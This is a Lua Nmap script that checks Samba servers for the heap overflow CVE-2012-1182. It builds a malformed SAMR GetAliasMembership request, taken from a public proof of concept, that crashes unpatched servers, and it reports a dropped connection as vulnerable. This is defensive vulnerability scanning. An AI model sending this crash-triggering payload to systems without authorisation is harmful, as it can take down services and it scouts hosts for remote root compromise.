local msrpc = require "msrpc"
local smb = require "smb"
local string = require "string"
local vulns = require "vulns"
local stdnse = require "stdnse"

-- NSE script description (user-facing text; kept verbatim).
-- Note the decision rule it documents: the check treats only a dropped
-- connection after the malformed SAMR request as VULNERABLE, and an RPC
-- fault as the patched behaviour (see the marker string tested in action).
description = [[
Checks if target machines are vulnerable to the Samba heap overflow vulnerability CVE-2012-1182.

Samba versions 3.6.3 and all versions previous to this are affected by
a vulnerability that allows remote code execution as the "root" user
from an anonymous connection.


CVE-2012-1182 marks multiple heap overflow vulnerabilities located in
PIDL based autogenerated code. This check script is based on PoC by ZDI
marked as ZDI-CAN-1503. Vulnerability lies in ndr_pull_lsa_SidArray
function where an attacker is under control of num_sids and can cause
insufficient memory to be allocated, leading to heap buffer overflow
and possibility of remote code execution.

Script builds a malicious packet and makes a SAMR GetAliasMembership
call which triggers the vulnerability. On the vulnerable system,
connection is dropped and result is "Failed to receive bytes after 5 attempts".
On patched system, samba throws an error and result is  "MSRPC call
returned a fault (packet type)".

References:
* https://bugzilla.samba.org/show_bug.cgi?id=8815
* http://www.samba.org/samba/security/CVE-2012-1182

]]

-----------------------------------------------------------------------
---
-- @usage
-- nmap --script=samba-vuln-cve-2012-1182  -p 139 <target>
-- @output
-- PORT    STATE SERVICE
-- 139/tcp open  netbios-ssn
--
-- Host script results:
-- | samba-vuln-cve-2012-1182:
-- |   VULNERABLE:
-- |   SAMBA remote heap overflow
-- |     State: VULNERABLE
-- |     IDs:  CVE:CVE-2012-1182
-- |     Risk factor: HIGH  CVSSv2: 10.0 (HIGH) (AV:N/AC:L/Au:N/C:C/I:C/A:C)
-- |     Description:
-- |       Samba versions 3.6.3 and all versions previous to this are affected by
-- |       a vulnerability that allows remote code execution as the "root" user
-- |       from an anonymous connection.
-- |
-- |     Disclosure date: 2012-03-15
-- |     References:
-- |       http://www.samba.org/samba/security/CVE-2012-1182
-- |_      http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1182

author = "Aleksandar Nikolic"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
-- "intrusive": the check sends a request that, per the description above,
-- crashes an unpatched smbd (the connection is dropped) -- it is not a
-- passive version probe and should not be run where a service outage is
-- unacceptable.
categories = {"vuln","intrusive"}

-- Host rule: run the check only when the smb library can find an SMB port
-- for this host (the port table is what action receives as nil otherwise).
hostrule = function(host)
  local smb_port = smb.get_port(host)
  return nil ~= smb_port
end

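-- Runs the CVE-2012-1182 check against one host.
--
-- Opens an anonymous SMB session to the SAMR pipe, binds to the SAMR
-- interface and sends the malformed GetAliasMembership request taken from
-- the ZDI PoC (a lsa_SidArray whose num_sids is far larger than the data
-- that follows).  The target is classified purely by how the transport
-- reacts: if the msrpc layer reports "Failed to receive bytes after 5
-- attempts" the connection was dropped and the host is reported VULNERABLE;
-- anything else (including the RPC fault a patched server returns) leaves
-- the state at NOT_VULN.
--
-- Changes versus the previous version of this function:
--   * the SMB session is always released via msrpc.stop_smb before
--     returning (previously it was only closed on the bind-failure path);
--   * the marker string is matched with a plain (non-pattern) find and
--     only when the result is actually a string;
--   * the observed transport error is recorded in the report so a reader
--     can judge the evidence -- a dropped connection is the only signal
--     used here and a network error or a middlebox reset looks the same;
--   * unused locals (stats, response) removed.
--
-- @param host The host table.
-- @param port The port table; nil for this hostrule script, passed through
--             to vulns.Report as before.
-- @return The vulns report for the host, or false plus an error string when
--         the SMB session or the SAMR bind could not be established.
action = function(host,port)

  local samba_cve  = {
    title = "SAMBA remote heap overflow",
    IDS = {CVE = 'CVE-2012-1182'},
    risk_factor = "HIGH",
    scores = {
      CVSSv2 = "10.0 (HIGH) (AV:N/AC:L/Au:N/C:C/I:C/A:C)",
    },
    description = [[
Samba versions 3.6.3 and all versions previous to this are affected by
a vulnerability that allows remote code execution as the "root" user
from an anonymous connection.
]],
    references = {
      'http://www.samba.org/samba/security/CVE-2012-1182',
    },
    dates = {
      disclosure = {year = '2012', month = '03', day = '15'},
    },
    exploit_results = {},
  }

  local report = vulns.Report:new(SCRIPT_NAME, host, port)
  samba_cve.state = vulns.STATE.NOT_VULN

  -- Anonymous (third argument true) SMB session to the SAMR pipe.
  local status, smbstate = msrpc.start_smb(host, msrpc.SAMR_PATH, true)
  if status == false then
    return false, smbstate
  end

  -- Bind to the SAMR interface on that pipe.
  local bind_result
  status, bind_result = msrpc.bind(smbstate, msrpc.SAMR_UUID, msrpc.SAMR_VERSION, nil)
  if status == false then
    msrpc.stop_smb(smbstate)
    return false, bind_result
  end

  -- Malicious lsa_SidArray, byte-for-byte as in the PoC: num_sids claims
  -- 4096 entries while only ~1 KiB of filler follows.  On an unpatched
  -- server ndr_pull_lsa_SidArray sizes its allocation from num_sids and
  -- overruns the heap.  The remaining fields are the PoC's filler values.
  local data = string.pack("<I4",4096)  -- num_sids
    .. "abcd"
    ..string.pack("<I4I4I4",100
      ,0
      ,100)
    ..string.rep("a",1000)

  -- Bogus 20-byte policy handle, as used by the PoC; no real SAMR object is
  -- opened first.
  local marshaled_handle = string.rep("X",20)

  local result
  status, result = msrpc.samr_getaliasmembership(smbstate, marshaled_handle, data)
  stdnse.debug2("msrpc.samr_getaliasmembership: %s, '%s'", status, result)

  -- The marker is a fixed msrpc error string, so search it plainly (4th
  -- argument) rather than as a Lua pattern, and only if result is a string.
  local dropped = status == false
    and type(result) == "string"
    and string.find(result, "Failed to receive bytes after 5 attempts", 1, true) ~= nil

  if dropped then
    samba_cve.state = vulns.STATE.VULN -- connection dropped, server crashed
    -- Keep the raw evidence in the report.  A dropped connection is the
    -- only signal this check has; a transport failure or an IPS/firewall
    -- reset during the call would be indistinguishable from a crash, so a
    -- reader should see what was actually observed and re-test if in doubt.
    samba_cve.extra_info = "Connection dropped after the malformed SAMR "
      .. "GetAliasMembership request: " .. result
  end

  -- Release the SMB session on every path.  The return value is ignored:
  -- if the server already dropped the connection there is nothing useful
  -- to do when teardown fails.
  msrpc.stop_smb(smbstate)

  return report:make_output(samba_cve)

end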